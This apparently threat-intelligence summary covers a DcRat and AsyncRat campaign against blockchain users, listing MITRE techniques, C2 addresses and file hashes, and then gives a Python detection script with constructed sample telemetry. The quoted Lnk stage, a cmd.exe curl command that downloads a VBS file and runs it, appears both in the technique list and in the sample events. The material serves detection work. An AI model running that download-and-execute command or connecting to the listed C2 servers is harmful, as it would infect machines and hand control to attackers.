DCRat Targeting Blockchain Users

A threat group is targeting blockchain users with a malicious zip file distributed through Telegram. The archive contains a decoy Lnk file that ultimately deploys the DcRat remote access Trojan. To evade detection the attack uses DLLs signed with counterfeited Qi’anxin certificates (per the linked report), a multi-stage payload delivery, and several different C2 servers.

Keypoints

  • Attackers distribute a malicious zip file named “transfer screenshot 2025.5.31.zip” via Telegram targeting blockchain customers.
  • The zip contains a decoy Lnk file that, when executed, downloads and runs a VBS script to deploy malicious components including digitally signed DLLs.
  • The malicious payload includes DcRat loaded in memory and communicates with multiple C2 servers using self-signed certificates mimicking legitimate domains.
  • A multi-stage infection process uses a “white and black” pair (DLL side-loading: a legitimate-looking pythonw.exe dropped to C:\Users\Public loads a malicious python310.dll placed beside it) to run shellcode and ultimately execute DcRat, with different C2 IP addresses in different stages.
  • The threat actors also create bitcoin selling websites, likely for fraud, which appear to be propagated through SEO using similar templates.
  • Qi’anxin’s security products including Liuhe engine and TIP platform can detect and block the attack by enabling cloud-based threat checks.
  • Another RAT named AsyncRat was identified with a digitally signed executable and a known C2 server, suggesting multiple remote access tools in use.

MITRE Techniques

  • [T1204] User Execution – Attackers use a malicious Lnk file to trick users into running commands that download and execute a VBS script. (“The Lnk file points to the following commands… cmd.exe /c “curl -o C:\Users\Public\aa.vbs … && start C:\Users\Public\aa.vbs””)
  • [T1059] Command and Scripting Interpreter – PowerShell and cmd.exe are used to download and execute payloads from remote servers. (“After establishing a connection with C2, start Powershell to download the payload for the second stage”)
  • [T1105] Ingress Tool Transfer – Malicious scripts and DLLs are downloaded from external URLs to the victim machine. (“Download the vbs script from the remote server and start it…”)
  • [T1574.002] Hijack Execution Flow: DLL Side-Loading – The “white and black” pair dropped to C:\Users\Public (a legitimate-looking pythonw.exe and a malicious python310.dll beside it) lets the malicious DLL run under a benign-looking process.
  • [T1055] Process Injection / [T1218.011] System Binary Proxy Execution: Rundll32 – Shellcode is written into a newly created rundll32.exe process and executed from memory rather than from a file on disk. (“load it into the newly created process rundll32.exe”)
  • [T1071] Application Layer Protocol – DcRat beacons to its C2 servers on ports 80 and 443 (and one on 8080) using a self-signed TLS certificate that mimics qianxin.com; AsyncRat uses its own C2 on port 6666. (“C2 with a self-signed certificate mimicking qianxin.com”)

Indicators of Compromise

  • [File Hash MD5] Malicious files associated with the attack – 05339834a0e7317505c74b58b19aaf0e, 1b98984d2438d7a5d14b4f373b55603b, and 3cf9a8d8b7b68160d7523e60b0e43cd5
  • [Domain] Hosting malicious payloads – zl-web-images.oss-cn-shenzhen.aliyuncs.com
  • [IP Address] DcRat Command and Control servers – 103.45.68.150:80|443, 103.45.68.244:80|443, 103.45.68.203:80|443, and 38.46.13.170:8080
  • [IP Address] AsyncRat Command and Control server – 148.178.16.22:6666
  • [Filename] Decoy and malicious files on victim machines – C:\Users\Public\aa.vbs, C:\Users\Public\pythonw.exe, C:\Users\Public\python310.dll
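The MITRE chain (Lnk → cmd.exe/curl → VBS → side-loaded DLL → shellcode in rundll32.exe) and the IoC list above together give enough to write host and network detections. The script below is an added example written for this page, not code from Qi’anxin or the report: it runs a small rule set over constructed, Sysmon-style event records embedded inline. The event field names (type, image, cmdline, parent, loaded, dst_ip, dst_port, dst_host) are an assumed simplified schema, the payload URL path is a placeholder because the page elides it, and the rule names are my own. Only the IP:port pairs, the hosting domain, and the C:\Users\Public filenames come from the IoC list.

```python
import re

# Network indicators copied from the page's IoC list as (ip, port) pairs.
DCRAT_C2 = {
    ("103.45.68.150", 80), ("103.45.68.150", 443),
    ("103.45.68.244", 80), ("103.45.68.244", 443),
    ("103.45.68.203", 80), ("103.45.68.203", 443),
    ("38.46.13.170", 8080),
}
ASYNCRAT_C2 = {("148.178.16.22", 6666)}
PAYLOAD_HOST = "zl-web-images.oss-cn-shenzhen.aliyuncs.com"

PUBLIC = "c:\\users\\public\\"   # drop directory used by every stage on the page

# Stage 1 (T1204 -> T1059 -> T1105):
#   cmd.exe /c "curl -o C:\Users\Public\<x>.vbs <url> && start C:\Users\Public\<x>.vbs"
LNK_STAGE = re.compile(
    r'curl(?:\.exe)?\s[^&]*-o\s+"?c:\\users\\public\\[^\s"]+\.vbs[^&]*&&\s*start\s',
    re.IGNORECASE,
)
# Split a rundll32 command line into image and arguments. No argument means no DLL
# to run, which is the shape of a process created only to receive injected shellcode.
RUNDLL32 = re.compile(r'^\s*"?(?:[^"\s]*\\)?rundll32(?:\.exe)?"?\s*(.*)$', re.IGNORECASE)


def _in_public(path):
    return path.lower().startswith(PUBLIC)


def detect(events):
    """Run the rules over a list of event dicts; return (rule, event_index) hits."""
    hits = []
    for i, e in enumerate(events):
        kind = e.get("type")
        if kind == "process":
            image = e["image"].lower()
            cmd = e.get("cmdline", "")
            parent = e.get("parent", "")
            if image.endswith("\\cmd.exe") and LNK_STAGE.search(cmd):
                hits.append(("lnk-curl-vbs", i))
            elif image == PUBLIC + "pythonw.exe":
                # the "white" half: a legitimate binary copied into a user-writable dir
                hits.append(("pythonw-in-public", i))
            elif image.endswith("\\rundll32.exe"):
                m = RUNDLL32.match(cmd)
                if m and not m.group(1).strip() and _in_public(parent):
                    hits.append(("rundll32-no-args-from-public", i))
        elif kind == "image_load":
            # the "black" half: python310.dll loaded from the same directory (T1574.002)
            if e["loaded"].lower() == PUBLIC + "python310.dll":
                hits.append(("python310.dll-sideload", i))
        elif kind == "network":
            pair = (e["dst_ip"], int(e["dst_port"]))
            if pair in DCRAT_C2:
                hits.append(("dcrat-c2", i))
            elif pair in ASYNCRAT_C2:
                hits.append(("asyncrat-c2", i))
            elif e.get("dst_host", "").lower() == PAYLOAD_HOST:
                hits.append(("payload-host", i))
    return hits


# Constructed sample telemetry: one full infection chain plus two benign look-alikes.
# The URL path "PLACEHOLDER" and the 203.0.113.10 address are invented; the page
# gives only the hosting domain.
SAMPLE_EVENTS = [
    {"type": "process", "image": "C:\\Windows\\System32\\cmd.exe", "parent": "C:\\Windows\\explorer.exe",
     "cmdline": 'cmd.exe /c "curl -o C:\\Users\\Public\\aa.vbs '
                'https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/PLACEHOLDER && start C:\\Users\\Public\\aa.vbs"'},
    {"type": "network", "dst_ip": "203.0.113.10", "dst_port": 443, "dst_host": PAYLOAD_HOST},
    {"type": "process", "image": "C:\\Users\\Public\\pythonw.exe", "parent": "C:\\Windows\\System32\\wscript.exe",
     "cmdline": "C:\\Users\\Public\\pythonw.exe"},
    {"type": "image_load", "image": "C:\\Users\\Public\\pythonw.exe", "loaded": "C:\\Users\\Public\\python310.dll"},
    {"type": "process", "image": "C:\\Windows\\System32\\rundll32.exe", "parent": "C:\\Users\\Public\\pythonw.exe",
     "cmdline": "rundll32.exe"},
    {"type": "network", "dst_ip": "103.45.68.150", "dst_port": 443},
    # benign: ordinary cmd.exe use and a normal rundll32 invocation with a DLL argument
    {"type": "process", "image": "C:\\Windows\\System32\\cmd.exe", "parent": "C:\\Windows\\explorer.exe",
     "cmdline": "cmd.exe /c dir"},
    {"type": "process", "image": "C:\\Windows\\System32\\rundll32.exe", "parent": "C:\\Windows\\explorer.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
    {"type": "network", "dst_ip": "148.178.16.22", "dst_port": 6666},
]


def run_sample():
    """Apply the rules to the constructed telemetry above."""
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for rule, idx in run_sample():
        print(f"event {idx}: {rule}")
```

The rundll32 rule keys on the absence of a DLL argument plus a parent in C:\Users\Public rather than on rundll32 alone, because rundll32 with a DLL,entry argument is everyday Windows activity; the side-loading rule keys on the exact drop path, since python310.dll loaded from a real Python install is expected. Both stay narrow to the chain the report describes; widen them with your own environment's baselines before deploying.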


Read more: https://ti.qianxin.com/blog/articles/counterfeiting-qianxin-certificates-targeted-attacks-against-blockchain-customers-en/